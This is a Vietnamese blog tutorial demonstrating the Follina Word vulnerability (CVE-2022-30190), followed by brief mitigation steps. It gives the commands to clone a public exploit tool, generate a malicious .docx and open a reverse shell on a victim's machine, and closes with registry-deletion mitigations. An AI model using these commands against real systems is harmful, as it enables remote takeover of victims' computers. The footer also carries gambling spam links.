• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Demo cách Khai thác lỗ hổng Follina của Microsoft Word

Hevin by Hevin
06/06/2022
in Basic Hacking
Reading Time: 5 mins read
A A
0

Mục lục bài viết

  1. Lỗ hổng Follina ( CVE-2022-30190 )
  2. Demo hacker khai thác lỗ hổng Follina 
  3. Cách phòng chống lỗ hổng Follina
  4. Bạn hãy sử dụng các phần mềm quét file tĩnh hoặc sử dụng Website Virustotal để scan nhé

Dạo gần đây, Microsoft đã công bố một lỗ hổng bảo mật mang tên Follina hay còn có tên gọi khác là CVE-2022-30190. Và cách thức khai thác như thế nào thì mình sẽ nói sau nha, bây giờ mình sẽ giới thiệu sơ qua về lỗ hổng này nhé!

Lưu ý: Bài viết này chỉ mang tính chất giáo dục và demo lại cách tin tặc khai thác lỗ hổng Follina. Mọi hành vi bất hợp pháp được thực hiện qua bài viết này thì Anonyviet sẽ không chịu mọi trách nhiệm mà bạn gây ra

Các bài viết liên quan

xoa file mo gan day word

Cách xóa lịch sử mở File gần đây trên Word

14/06/2022
ma doc dinh kem file word

Cảnh giác thủ đoạn đính kèm Virus vào File Word mới nhất 2022

31/05/2022
redteam toolkit

Hướng dẫn sử dụng RedTeam Toolkit – Phần mềm tìm kiếm lỗi bảo mật

31/05/2022
nuclei quét lỗ hổng bảo mật

Cách cài đặt Nuclei để quét lỗ hổng bảo mật Website

11/05/2022

Bài viết này cũng không có gì đặc biệt lắm nên mình xin phép kết thúc bài viết sớm

Lỗ hổng Follina ( CVE-2022-30190 )

Follina CVE-2022-30190
Là một lỗ hổng được phát hiện trong Microsoft Word, là một lỗ hổng được thực thi mã lệnh từ xa bằng cách này các hacker có thể dễ dàng chiếm quyền điều khiển máy nạn nhân mà không gặp khó khăn. Không chỉ vậy các phần mềm diệt Virus cũng như AV trên Windows cũng bị lỗ hổng này vượt qua dễ dàng. Tính đến thời điểm hiện tại thì chưa có bản vá cho lỗ hổng này.

Chính vì vậy, các lượt khai thác lỗ hổng này càng ngày tăng lên rất nhanh và đương nhiên nguy cơ tấn công mạng là rất cao nhé. Vậy là mình đã giới thiệu sơ qua về lỗ hổng CVE-2022-30190 rồi ! Bạn nào muốn tìm hiểu chi tiết hơn về lỗ hổng này thì search Google ha ^^ Còn bây giờ mình sẽ Demo lại cho các bạn xem và nêu ra cách phòng chống lỗ hổng này nhé !

Demo hacker khai thác lỗ hổng Follina 

Hacker sẽ sử dụng công cụ MSDT-FOLLINA được xây dựng bởi tác giả JohnHammond, cách cài đặt như sau:

git clone https://github.com/JohnHammond/msdt-follina

cd msdt-follina

Các bạn nhập lệnh python3 follina.py -h để bản hướng dẫn nhé

Công cụ Follina

Hacker sẽ nhập lệnh sau để tạo ra một file Word có đuôi .docx hoặc .doc sau đó gửi cho nạn nhân kích hoạt: python3 follina.py -i wlan0 -o anonyviet.docx . Và khi nạn nhân kích hoạt vào file Word, thì trong file Word đó có đính kèm link HTML kết thúc bằng kí tự “!” và chứa đoạn mã JavaScript với giao thức ms-msdt://

Khai thác lỗ hổng Follina

Hacker sử dụng dòng lệnh sau để tạo ra file Word chiếm quyền điều khiển máy của nạn nhân: python3 follina.py -r 6677 -o anonyviet.docx Bây giờ hacker sẽ gửi file độc này cho nạn nhân, và khi nạn nhân kích hoạt hacker đã dễ dàng có quyền điều khiển máy bạn thông qua CMD trên Windows. Sau khi mà hacker điều khiển máy nạn nhân chán rồi thì nhập lệnh sau: shutdown -s -t -c "GoodBye Server".

Follina CVE-2022-30190

Cách phòng chống lỗ hổng Follina

Bạn hãy sử dụng các phần mềm quét file tĩnh hoặc sử dụng Website Virustotal để scan nhé

Nếu có dấu hiệu lạ trên máy của bạn thì bạn hãy mở Taskmanager sau đó kiểm tra xem có file msdt.exe đang chạy ko, và có thì bạn hãy tắt nhanh còn kịp =))

Ngoài ra bạn có thể sử dụng CMD để vô hiệu hóa:

Bước 1: Mở CMD với quyền Admin

Bước 2: chạy lệnh reg export HKEY_CLASSES_ROOT\ms-msdt filename để sao lưu registry key

Bước 3: chạy lệnh reg delete HKEY_CLASSES_ROOT\ms-msdt /f để vô hiệu hóa

Vậy là mình đã demo lại và nói sơ qua về lỗ hổng Follina cũng như cách phòng chống. Nếu bạn nào phát hiện cách phòng chống khác thì hãy bình luận ngay phía dưới để cho mình biết nhé. Và mình cũng mong rằng các bạn không nên sử dụng lỗ hổng này vào mục đích tấn công mạng thay vì đó bạn hãy thử test trên máy ảo sẽ tốt hơn đấy !

Bạn có thể đọc thêm bài viết Cảnh giác thủ đoạn đính kèm virus vào file word mới nhất 2022 tại Anonyviet nhé.

Tags: cveCVE-2022-30190Follinakhai thác wordlỗ hổng bảo mậtWord
Previous Post

Porkbun đang cho đăng ký miễn phí hơn 10 loại Domain khác nhau

Next Post

Cách nhận 800K từ ngân hàng VIB cực dễ bằng MyVIB 2.0

Hevin

Hevin

Related Posts

Cách mình hack trang web của một trường học 1
Basic Hacking

Cách mình hack trang web của một trường học

25/06/2022
SMS bomber
Basic Hacking

Hướng dẫn sử dụng tool spam SMS OTP

24/06/2022
Cách mình hack trang web của một trường học 2
Basic Hacking

Cách hack pass WiFi trên Windows với Aircrack

22/06/2022
Cách mình hack trang web của một trường học 3
Basic Hacking

Cách Hack tính năng Reset Password trên Website để chiếm quyền User

21/06/2022
Cách mình hack trang web của một trường học 4
Basic Hacking

Hướng dẫn dùng nmap để scan Port

19/06/2022
Cách mình hack trang web của một trường học 5
Basic Hacking

Cách khai thác lỗi Command Injection

18/06/2022
Next Post
Cách mình hack trang web của một trường học 6

Cách nhận 800K từ ngân hàng VIB cực dễ bằng MyVIB 2.0

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

0 Comments
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

Cuộc sống tiện nghi hơn với tủ lạnh thông minh

Top 6 món đồ công nghệ nhất định phải có trong nhà

27/06/2022
tăng follow fb

Cách tăng follow Facebook miễn phí và nhanh nhất

27/06/2022
Cách mình hack trang web của một trường học 7

6 thay đổi mà người dùng Windows cần chấp nhận khi chuyển sang Linux

26/06/2022
wingiare

Cách cài, mua bản quyền AutoCAD giá rẻ cho Mac M1, Windows

25/06/2022 - Updated on 26/06/2022
Cách mình hack trang web của một trường học 8

Cách mình hack trang web của một trường học

25/06/2022

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Bài viết mới

  • Top 6 món đồ công nghệ nhất định phải có trong nhà
  • Cách tăng follow Facebook miễn phí và nhanh nhất
  • 6 thay đổi mà người dùng Windows cần chấp nhận khi chuyển sang Linux
  • Cách cài, mua bản quyền AutoCAD giá rẻ cho Mac M1, Windows
  • Cách mình hack trang web của một trường học
  • Cùng tìm hiểu API, REST API và RESTful API là gì?

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery sun86 stackoverflow tool tài xỉu 68 club 68 game bài

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery sun86 stackoverflow tool tài xỉu 68 club 68 game bài

wpDiscuz
pixel